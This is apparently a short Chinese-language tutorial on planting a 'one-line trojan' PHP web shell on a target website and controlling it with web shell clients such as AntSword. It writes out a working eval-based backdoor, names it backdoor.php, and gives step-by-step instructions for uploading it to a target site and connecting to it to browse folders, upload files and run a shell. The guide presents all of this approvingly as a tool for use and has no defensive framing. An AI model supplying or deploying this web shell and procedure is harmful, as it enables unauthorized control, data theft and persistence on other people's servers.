一句话木马的作用: 上传到某网站后台(php, asp, jsp ... ) ,然后再攻击者段运行webshell(菜刀)类程序,就可以连接,实现:
1 文件夹的浏览
2 上传文件
3 webshell
webshell分成:
中国菜刀(已经挂掉了,找不到地方下载. exe 文件, 只运行在 windows)
Cknife java程序,可以跨平台(理论上),实际上无法在 kali上运行。 windows可以运行,界面不太友好
剑蚁:antsword, 特别好用,参考:https://github.com/AntSwordProject/AntSword-Loader
具体用法:https://doc.u0u.us/zh-hans/getting_started/first_shell.html
下载: 直接github下载即可。
使用:
1. 在目标网站上传一个文件,(一句话木马 例如叫 backdoor.php)内容如下:
<?php @eval($_POST['secret']) ?>
2. 上面php文件可以通过某路径访问,例如: http://target.com/backdoor.php
3. 打开剑蚁。
右键,添加数据。
url: (见上面)
连接密码 : secret
就可以了。
点击 测试,就可以看到可以连接了。
保存后,打开,就可以看到对应的各种功能了。 666
太强大了。
